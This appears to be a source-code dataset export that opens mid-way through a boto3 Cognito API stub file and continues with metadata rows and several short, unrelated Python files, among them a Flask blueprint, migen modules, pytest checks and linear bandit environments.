See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
:type AllowedOAuthFlows: list
:param AllowedOAuthFlows:
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
- *(string) --*
:type AllowedOAuthScopes: list
:param AllowedOAuthScopes:
A list of allowed ``OAuth`` scopes. Currently supported values are ``\"phone\"`` , ``\"email\"`` , ``\"openid\"`` , and ``\"Cognito\"`` .
- *(string) --*
:type AllowedOAuthFlowsUserPoolClient: boolean
:param AllowedOAuthFlowsUserPoolClient:
Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
:type AnalyticsConfiguration: dict
:param AnalyticsConfiguration:
The Amazon Pinpoint analytics configuration for collecting metrics for this user pool.
- **ApplicationId** *(string) --* **[REQUIRED]**
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --* **[REQUIRED]**
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --* **[REQUIRED]**
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:rtype: dict
:returns:
"""
pass
def update_user_pool_domain(self, Domain: str, UserPoolId: str, CustomDomainConfig: Dict) -> Dict:
"""
Updates the Secure Sockets Layer (SSL) certificate for the custom domain for your user pool.
You can use this operation to provide the Amazon Resource Name (ARN) of a new certificate to Amazon Cognito. You cannot use it to change the domain for a user pool.
A custom domain is used to host the Amazon Cognito hosted UI, which provides sign-up and sign-in pages for your application. When you set up a custom domain, you provide a certificate that you manage with AWS Certificate Manager (ACM). When necessary, you can use this operation to change the certificate that you applied to your custom domain.
Usually, this is unnecessary following routine certificate renewal with ACM. When you renew your existing certificate in ACM, the ARN for your certificate remains the same, and your custom domain uses the new certificate automatically.
However, if you replace your existing certificate with a new one, ACM gives the new certificate a new ARN. To apply the new certificate to your custom domain, you must provide this ARN to Amazon Cognito.
When you add your new certificate in ACM, you must choose US East (N. Virginia) as the AWS Region.
After you submit your request, Amazon Cognito requires up to 1 hour to distribute your new certificate to your custom domain.
For more information about adding a custom domain to your user pool, see `Using Your Own Domain for the Hosted UI <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-add-custom-domain.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserPoolDomain>`_
**Request Syntax**
::
response = client.update_user_pool_domain(
Domain='string',
UserPoolId='string',
CustomDomainConfig={
'CertificateArn': 'string'
}
)
**Response Syntax**
::
{
'CloudFrontDomain': 'string'
}
**Response Structure**
- *(dict) --*
The UpdateUserPoolDomain response output.
- **CloudFrontDomain** *(string) --*
The Amazon CloudFront endpoint that Amazon Cognito set up when you added the custom domain to your user pool.
:type Domain: string
:param Domain: **[REQUIRED]**
The domain name for the custom domain that hosts the sign-up and sign-in pages for your application. For example: ``auth.example.com`` .
This string can include only lowercase letters, numbers, and hyphens. Do not use a hyphen for the first or last character. Use periods to separate subdomain names.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The ID of the user pool that is associated with the custom domain that you are updating the certificate for.
:type CustomDomainConfig: dict
:param CustomDomainConfig: **[REQUIRED]**
The configuration for a custom domain that hosts the sign-up and sign-in pages for your application. Use this object to specify an SSL certificate that is managed by ACM.
- **CertificateArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an AWS Certificate Manager SSL certificate. You use this certificate for the subdomain of your custom domain.
:rtype: dict
:returns:
"""
pass
def verify_software_token(self, UserCode: str, AccessToken: str = None, Session: str = None, FriendlyDeviceName: str = None) -> Dict:
"""
Use this API to register a user's entered TOTP code and mark the user's software token MFA status as "verified" if successful. The request takes an access token or a session string, but not both.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/VerifySoftwareToken>`_
**Request Syntax**
::
response = client.verify_software_token(
AccessToken='string',
Session='string',
UserCode='string',
FriendlyDeviceName='string'
)
**Response Syntax**
::
{
'Status': 'SUCCESS'|'ERROR',
'Session': 'string'
}
**Response Structure**
- *(dict) --*
- **Status** *(string) --*
The status of the verify software token.
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service.
:type AccessToken: string
:param AccessToken:
The access token.
:type Session: string
:param Session:
The session which should be passed both ways in challenge-response calls to the service.
:type UserCode: string
:param UserCode: **[REQUIRED]**
The one time password computed using the secret code returned by
:type FriendlyDeviceName: string
:param FriendlyDeviceName:
The friendly device name.
:rtype: dict
:returns:
"""
pass
def verify_user_attribute(self, AccessToken: str, AttributeName: str, Code: str) -> Dict:
"""
Verifies the specified user attributes in the user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/VerifyUserAttribute>`_
**Request Syntax**
::
response = client.verify_user_attribute(
AccessToken='string',
AttributeName='string',
Code='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
A container representing the response from the server from the request to verify user attributes.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
Represents the access token of the request to verify user attributes.
:type AttributeName: string
:param AttributeName: **[REQUIRED]**
The attribute name in the request to verify user attributes.
:type Code: string
:param Code: **[REQUIRED]**
The verification code in the request to verify user attributes.
:rtype: dict
:returns:
"""
pass
| 50.698219
| 672
| 0.543236
| 36,952
| 387,233
| 5.660397
| 0.037048
| 0.018976
| 0.014568
| 0.009485
| 0.863355
| 0.833905
| 0.808135
| 0.788892
| 0.774444
| 0.763127
| 0
| 0.006226
| 0.360834
| 387,233
| 7,637
| 673
| 50.704858
| 0.838856
| 0.808978
| 0
| 0.481308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.481308
| false
| 0.509346
| 0.056075
| 0
| 0.542056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
669cf503e44c76598655d2f2beaca96e99fc93b6
| 124
|
py
|
Python
|
mycloud/commands/drive/fs/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 4
|
2019-11-28T22:10:43.000Z
|
2022-01-23T15:18:26.000Z
|
mycloud/commands/drive/fs/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 18
|
2019-01-20T22:30:48.000Z
|
2020-06-09T21:16:07.000Z
|
mycloud/commands/drive/fs/__init__.py
|
thomasgassmann/mycloud-cli
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | null | null | null |
from mycloud.commands.drive.fs.upsync import upsync_command
from mycloud.commands.drive.fs.downsync import downsync_command
| 41.333333
| 63
| 0.870968
| 18
| 124
| 5.888889
| 0.5
| 0.207547
| 0.358491
| 0.45283
| 0.490566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 124
| 2
| 64
| 62
| 0.913793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
66ac9d95879bfe0e276197a480e35f4dc5b5eadb
| 573
|
py
|
Python
|
python-logic/04-logical-operators.py
|
oviniciusoliveira/python-bootcamp
|
cd08ec4ec30049822c283a656307a5dcb25b5d99
|
[
"MIT"
] | null | null | null |
python-logic/04-logical-operators.py
|
oviniciusoliveira/python-bootcamp
|
cd08ec4ec30049822c283a656307a5dcb25b5d99
|
[
"MIT"
] | null | null | null |
python-logic/04-logical-operators.py
|
oviniciusoliveira/python-bootcamp
|
cd08ec4ec30049822c283a656307a5dcb25b5d99
|
[
"MIT"
] | null | null | null |
print('*-----Logical Operator (and)-----*')
high_income = True
good_credit = False
if high_income and good_credit:
print("Eligible for loan")
else:
print("Not eligible for loan")
print('\n*-----Logical Operator (or)-----*')
high_income = True
good_credit = False
if high_income or good_credit:
print("Eligible for loan")
else:
print("Not eligible for loan")
print('\n*-----Logical Operator (or)-----*')
student = True
print('\n*-----Logical Operator (not)-----*')
if not student:
print("Eligible for loan")
else:
print("Not eligible for loan")
| 21.222222
| 45
| 0.649215
| 78
| 573
| 4.666667
| 0.24359
| 0.181319
| 0.247253
| 0.164835
| 0.793956
| 0.793956
| 0.793956
| 0.793956
| 0.793956
| 0.568681
| 0
| 0
| 0.158813
| 573
| 26
| 46
| 22.038462
| 0.755187
| 0
| 0
| 0.714286
| 0
| 0
| 0.443281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.47619
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
dd4c45715955fe2918fdae997389d00f2bc722d5
| 1,126
|
py
|
Python
|
apps/controllerx/cx_devices/terncy.py
|
Crocmagnon/controllerx
|
d928d5fc8d7ab50a86417227d5b732aea43cb653
|
[
"MIT"
] | 204
|
2020-01-18T10:12:13.000Z
|
2022-03-27T09:40:17.000Z
|
apps/controllerx/cx_devices/terncy.py
|
Crocmagnon/controllerx
|
d928d5fc8d7ab50a86417227d5b732aea43cb653
|
[
"MIT"
] | 329
|
2020-01-17T17:18:53.000Z
|
2022-03-29T11:20:30.000Z
|
apps/controllerx/cx_devices/terncy.py
|
Crocmagnon/controllerx
|
d928d5fc8d7ab50a86417227d5b732aea43cb653
|
[
"MIT"
] | 66
|
2020-01-19T20:17:21.000Z
|
2022-03-13T15:03:41.000Z
|
from cx_const import DefaultActionsMapping, Light
from cx_core import LightController
from cx_core.integration import EventData
class TerncyPP01LightController(LightController):
def get_zha_actions_mapping(self) -> DefaultActionsMapping:
return {
"button_single": Light.TOGGLE,
"button_double": Light.ON_FULL_BRIGHTNESS,
"button_triple": Light.ON_MIN_BRIGHTNESS,
"button_quadruple": Light.SET_HALF_BRIGHTNESS,
"button_quintuple": Light.SET_HALF_COLOR_TEMP,
}
def get_zha_action(self, data: EventData) -> str:
return data["command"]
class TerncySD01LightController(LightController):
def get_zha_actions_mapping(self) -> DefaultActionsMapping:
return {
"button_single": Light.TOGGLE,
"button_double": Light.ON_FULL_BRIGHTNESS,
"button_triple": Light.ON_MIN_BRIGHTNESS,
"button_quadruple": Light.SET_HALF_BRIGHTNESS,
"button_quintuple": Light.SET_HALF_COLOR_TEMP,
}
def get_zha_action(self, data: EventData) -> str:
return data["command"]
| 35.1875
| 63
| 0.688277
| 119
| 1,126
| 6.168067
| 0.327731
| 0.13079
| 0.049046
| 0.065395
| 0.768392
| 0.768392
| 0.768392
| 0.768392
| 0.768392
| 0.768392
| 0
| 0.004603
| 0.228242
| 1,126
| 31
| 64
| 36.322581
| 0.840046
| 0
| 0
| 0.72
| 0
| 0
| 0.138544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.12
| 0.16
| 0.52
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
06d11ac6b6242d7b80eac8fef069c7f957f23066
| 732
|
py
|
Python
|
unitbench/tests/modules/example.py
|
MaxenceCaronLasne/unitbench
|
6ee246f9d19594f3c9fb6a991c28fec9fda718b2
|
[
"BSD-2-Clause"
] | 1
|
2019-11-04T08:34:43.000Z
|
2019-11-04T08:34:43.000Z
|
unitbench/tests/modules/example.py
|
MaxenceCaronLasne/unitbench
|
6ee246f9d19594f3c9fb6a991c28fec9fda718b2
|
[
"BSD-2-Clause"
] | 2
|
2019-12-12T12:06:03.000Z
|
2019-12-16T18:43:25.000Z
|
unitbench/tests/modules/example.py
|
MaxenceCaronLasne/unitbench
|
6ee246f9d19594f3c9fb6a991c28fec9fda718b2
|
[
"BSD-2-Clause"
] | null | null | null |
from migen import Module, Signal
class ExampleModule(Module):
def __init__(self, width):
self.i_first = Signal(width)
self.i_second = Signal(width)
self.o_first = Signal(width)
self.o_second = Signal(width)
###
self.sync += [
self.o_first.eq(self.i_first),
self.o_second.eq(self.i_second)
]
class BadExampleModule(Module):
def __init__(self, width):
self.i_first = Signal(width)
self.i_second = Signal(width)
self.o_first = Signal(width)
self.o_second = Signal(width)
###
self.sync += [
self.o_first.eq(~self.i_first),
self.o_second.eq(~self.i_second)
]
| 21.529412
| 44
| 0.565574
| 91
| 732
| 4.285714
| 0.197802
| 0.230769
| 0.307692
| 0.205128
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0
| 0
| 0.315574
| 732
| 33
| 45
| 22.181818
| 0.778443
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
06ea2a537df0f61dd983409b2ea4104c96a89dea
| 166
|
py
|
Python
|
app/auth/__init__.py
|
xmedinavei/toDO-flask
|
10f226a5dfa6634d4419fc27f36de3f4f98f824b
|
[
"MIT"
] | null | null | null |
app/auth/__init__.py
|
xmedinavei/toDO-flask
|
10f226a5dfa6634d4419fc27f36de3f4f98f824b
|
[
"MIT"
] | null | null | null |
app/auth/__init__.py
|
xmedinavei/toDO-flask
|
10f226a5dfa6634d4419fc27f36de3f4f98f824b
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
# Todos los routes '/auth' serán reririgidas a este Blueprint
auth = Blueprint('auth', __name__, url_prefix='/auth')
from . import views
| 27.666667
| 61
| 0.759036
| 23
| 166
| 5.26087
| 0.695652
| 0.214876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144578
| 166
| 6
| 62
| 27.666667
| 0.852113
| 0.355422
| 0
| 0
| 0
| 0
| 0.084906
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
660bd71e51e8d467a4e4410d141834ed011b5563
| 786
|
py
|
Python
|
web/home/tests/test_templates.py
|
RaulBSantos/maria-quiteria
|
9eb1a307099e208ce666bcc0d65be9c9a4cae150
|
[
"MIT"
] | 151
|
2019-11-10T02:18:25.000Z
|
2022-01-18T14:28:25.000Z
|
web/home/tests/test_templates.py
|
RaulBSantos/maria-quiteria
|
9eb1a307099e208ce666bcc0d65be9c9a4cae150
|
[
"MIT"
] | 202
|
2019-11-09T16:27:19.000Z
|
2022-03-22T12:41:27.000Z
|
web/home/tests/test_templates.py
|
RaulBSantos/maria-quiteria
|
9eb1a307099e208ce666bcc0d65be9c9a4cae150
|
[
"MIT"
] | 69
|
2020-02-05T01:33:35.000Z
|
2022-03-30T10:39:27.000Z
|
import pytest
class TestHome:
def test_append_google_analytics_key(self, settings, client):
settings.GOOGLE_ANALYTICS_KEY = "UA-000000000-1"
response = client.get("/")
assert "UA-000000000-1" in str(response.content)
@pytest.mark.django_db
class TestAdmin:
def test_append_google_analytics_key(self, settings, admin_client):
settings.GOOGLE_ANALYTICS_KEY = "UA-000000000-1"
response = admin_client.get("/admin/")
assert "UA-000000000-1" in str(response.content)
@pytest.mark.django_db
class TestPanel:
def test_append_google_analytics_key(self, settings, client):
settings.GOOGLE_ANALYTICS_KEY = "UA-000000000-1"
response = client.get("/painel/")
assert "UA-000000000-1" in str(response.content)
| 31.44
| 71
| 0.709924
| 101
| 786
| 5.306931
| 0.287129
| 0.16791
| 0.201493
| 0.106343
| 0.863806
| 0.863806
| 0.863806
| 0.863806
| 0.712687
| 0.615672
| 0
| 0.093168
| 0.180662
| 786
| 24
| 72
| 32.75
| 0.73913
| 0
| 0
| 0.555556
| 0
| 0
| 0.127226
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.166667
| false
| 0
| 0.055556
| 0
| 0.388889
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
663aa7f765dfe1fda166a04cac2440cf4d6bd00d
| 7,215
|
py
|
Python
|
rnlps/environments/linear_bandits.py
|
mlisicki/rnlps
|
2f3014c9502285ffe2340826d15185e5f8147e6f
|
[
"MIT"
] | 7
|
2019-11-27T12:11:28.000Z
|
2021-12-14T15:27:18.000Z
|
rnlps/environments/linear_bandits.py
|
mlisicki/rnlps
|
2f3014c9502285ffe2340826d15185e5f8147e6f
|
[
"MIT"
] | null | null | null |
rnlps/environments/linear_bandits.py
|
mlisicki/rnlps
|
2f3014c9502285ffe2340826d15185e5f8147e6f
|
[
"MIT"
] | 2
|
2021-02-23T19:24:59.000Z
|
2021-03-22T21:50:18.000Z
|
"""
Linear bandit environments to evaluate performance.
"""
import numpy as np
import os
class StationaryLinearBandit:
def __init__(self, n_arms, dimension, seed, arm_pool_size = 2000, err_sigma = 0.05):
self.n_arms = n_arms
self.dimension = dimension
self.arm_pool_size = arm_pool_size
self.err_sigma = err_sigma
self.random_state = np.random.RandomState(seed)
self.theta_star = self.generate_theta_star()
self.arm_pool = self.generate_arm_pool()
self.current_arms = []
self.step = 0
def generate_theta_star(self):
theta_star_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.dimension,))
return theta_star_unnormalized/np.linalg.norm(theta_star_unnormalized)
def generate_arm_pool(self):
arm_pool_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.arm_pool_size, self.dimension))
return arm_pool_unnormalized/np.linalg.norm(arm_pool_unnormalized, keepdims = True, axis = 1)
def sample_arms(self):
indices = self.random_state.choice(self.arm_pool_size, size = self.n_arms, replace = False)
return self.arm_pool[indices]
def reset(self):
self.step = 0
arms_context = self.sample_arms()
self.current_arms = arms_context
return arms_context
def pull(self, arm):
if (arm >= self.n_arms) or (arm < 0):
raise Exception('Invalid arm.')
expected_reward = np.dot(self.current_arms[arm], self.theta_star)
best_arm = self.best_arms()
regret = np.dot(self.current_arms[best_arm[0]] , self.theta_star) - expected_reward
reward = expected_reward + self.random_state.normal(0, self.err_sigma)
self.step += 1
context = self.sample_arms()
self.current_arms = context
return reward, context, regret
def best_arms(self):
means = np.dot(self.current_arms, self.theta_star)
return [np.argmax(means)]
def expected_cumulative_rewards(self, trial_length):
raise NotImplementedError
def __repr__(self):
r = 'StationaryLinearBandit(n_arms={0}, dimension={1}, arm_pool_size={2})'
return r.format(self.n_arms, self.dimension, self.arm_pool_size)
class FlippingLinearBandit:
def __init__(self, n_arms, dimension, half_period, seed, arm_pool_size = 2000, err_sigma = 0.05):
self.n_arms = n_arms
self.dimension = dimension
self.arm_pool_size = arm_pool_size
self.err_sigma = err_sigma
self.half_period = half_period
self.random_state = np.random.RandomState(seed)
self.theta_star = self.generate_theta_star()
self.arm_pool = self.generate_arm_pool()
self.current_arms = []
self.step = 0
def generate_theta_star(self):
theta_star_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.dimension,))
return theta_star_unnormalized/np.linalg.norm(theta_star_unnormalized)
def generate_arm_pool(self):
arm_pool_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.arm_pool_size, self.dimension))
return arm_pool_unnormalized/np.linalg.norm(arm_pool_unnormalized, keepdims = True, axis = 1)
def sample_arms(self):
indices = self.random_state.choice(self.arm_pool_size, size = self.n_arms, replace = False)
return self.arm_pool[indices]
def reset(self):
self.step = 0
arms_context = self.sample_arms()
self.current_arms = arms_context
return arms_context
def pull(self, arm):
if (arm >= self.n_arms) or (arm < 0):
raise Exception('Invalid arm.')
expected_reward = np.dot(self.current_arms[arm], self.theta_star)
best_arm = self.best_arms()
regret = np.dot(self.current_arms[best_arm[0]] , self.theta_star) - expected_reward
reward = expected_reward + self.random_state.normal(0, self.err_sigma)
self.step += 1
context = self.sample_arms()
# Update theta_star
if self.step % self.half_period == 0:
self.theta_star = -1 * self.theta_star
self.current_arms = context
return reward, context, regret
def best_arms(self):
means = np.dot(self.current_arms, self.theta_star)
return [np.argmax(means)]
def expected_cumulative_rewards(self, trial_length):
raise NotImplementedError
def __repr__(self):
r = 'FlippingLinearBandit(n_arms={0}, dimension={1}, half_period={2}, arm_pool_size={3})'
return r.format(self.n_arms, self.dimension, self.half_period, self.arm_pool_size)
class RotatingLinearBandit2d:
def __init__(self, n_arms, time_period, seed, arm_pool_size = 2000, err_sigma = 0.05):
self.n_arms = n_arms
self.dimension = 2
self.arm_pool_size = arm_pool_size
self.err_sigma = err_sigma
self.time_period = time_period
self.random_state = np.random.RandomState(seed)
self.arm_pool = self.generate_arm_pool()
self.current_arms = []
self.step = 0
self.theta_star = np.array([np.cos(2 * np.pi * self.step/self.time_period), np.sin(2 * np.pi * self.step/self.time_period)])
def generate_arm_pool(self):
arm_pool_unnormalized = self.random_state.uniform(low = -1, high = 1, size = (self.arm_pool_size, self.dimension))
return arm_pool_unnormalized/np.linalg.norm(arm_pool_unnormalized, keepdims = True, axis = 1)
def sample_arms(self):
indices = self.random_state.choice(self.arm_pool_size, size = self.n_arms, replace = False)
return self.arm_pool[indices]
def reset(self):
self.step = 0
arms_context = self.sample_arms()
self.current_arms = arms_context
return arms_context
def pull(self, arm):
if (arm >= self.n_arms) or (arm < 0):
raise Exception('Invalid arm.')
expected_reward = np.dot(self.current_arms[arm], self.theta_star)
best_arm = self.best_arms()
regret = np.dot(self.current_arms[best_arm[0]] , self.theta_star) - expected_reward
reward = expected_reward + self.random_state.normal(0, self.err_sigma)
self.step += 1
context = self.sample_arms()
# Update theta_star
self.theta_star = np.array([np.cos(2 * np.pi * self.step/self.time_period), np.sin(2 * np.pi * self.step/self.time_period)])
self.current_arms = context
return reward, context, regret
def best_arms(self):
means = np.dot(self.current_arms, self.theta_star)
return [np.argmax(means)]
def expected_cumulative_rewards(self, trial_length):
raise NotImplementedError
def __repr__(self):
r = 'RotatingLinearBandit2d(n_arms={0}, dimension={1}, time_period={2}, arm_pool_size={3})'
return r.format(self.n_arms, self.dimension, self.half_period, self.arm_pool_size)
linear_bandits = {'StationaryLinearBandit': StationaryLinearBandit,
'FlippingLinearBandit': FlippingLinearBandit,
'RotatingLinearBandit2d' : RotatingLinearBandit2d}
| 33.714953
| 132
| 0.665419
| 970
| 7,215
| 4.673196
| 0.091753
| 0.064858
| 0.05096
| 0.039709
| 0.900507
| 0.881756
| 0.870726
| 0.870726
| 0.870726
| 0.851092
| 0
| 0.013302
| 0.228967
| 7,215
| 213
| 133
| 33.873239
| 0.801546
| 0.012197
| 0
| 0.856115
| 0
| 0
| 0.047237
| 0.020245
| 0
| 0
| 0
| 0
| 0
| 1
| 0.18705
| false
| 0
| 0.014388
| 0
| 0.366906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9ff0aca83804512c03c04980017d6265c8816030
| 131
|
py
|
Python
|
api/resources_portal/views/__init__.py
|
arielsvn/resources-portal
|
f5a25935e45ceb05e2f4738f567eec9ca8793441
|
[
"BSD-3-Clause"
] | null | null | null |
api/resources_portal/views/__init__.py
|
arielsvn/resources-portal
|
f5a25935e45ceb05e2f4738f567eec9ca8793441
|
[
"BSD-3-Clause"
] | null | null | null |
api/resources_portal/views/__init__.py
|
arielsvn/resources-portal
|
f5a25935e45ceb05e2f4738f567eec9ca8793441
|
[
"BSD-3-Clause"
] | null | null | null |
from resources_portal.views.material import MaterialViewSet
from resources_portal.views.user import UserCreateViewSet, UserViewSet
| 43.666667
| 70
| 0.89313
| 15
| 131
| 7.666667
| 0.666667
| 0.226087
| 0.330435
| 0.417391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068702
| 131
| 2
| 71
| 65.5
| 0.942623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b05e582a216b447e231253fed1db510081302010
| 76
|
py
|
Python
|
jmatcher/search/admin.py
|
jamesaud/se1-group4
|
5280b13dff33e72ce717318a8dd78a06cd6effb3
|
[
"MIT"
] | 1
|
2021-09-09T15:43:09.000Z
|
2021-09-09T15:43:09.000Z
|
jmatcher/usermessages/admin.py
|
jamesaud/se1-group4
|
5280b13dff33e72ce717318a8dd78a06cd6effb3
|
[
"MIT"
] | null | null | null |
jmatcher/usermessages/admin.py
|
jamesaud/se1-group4
|
5280b13dff33e72ce717318a8dd78a06cd6effb3
|
[
"MIT"
] | null | null | null |
from django.contrib.admin import AdminSite
from django.contrib import admin
| 25.333333
| 42
| 0.855263
| 11
| 76
| 5.909091
| 0.545455
| 0.307692
| 0.523077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 43
| 38
| 0.955882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c672107f6b872e6d58ad3030fed3b17c0bea1c1d
| 40,712
|
py
|
Python
|
ok.py
|
BlackTiger-Error404/Black
|
463866d5e3be390fc6019a4ec45d2a772ca71866
|
[
"Apache-2.0"
] | 2
|
2021-06-01T08:00:23.000Z
|
2021-08-16T06:42:11.000Z
|
ok.py
|
BlackTiger-Error404/Black
|
463866d5e3be390fc6019a4ec45d2a772ca71866
|
[
"Apache-2.0"
] | null | null | null |
ok.py
|
BlackTiger-Error404/Black
|
463866d5e3be390fc6019a4ec45d2a772ca71866
|
[
"Apache-2.0"
] | 1
|
2020-11-09T17:08:16.000Z
|
2020-11-09T17:08:16.000Z
|
import base64
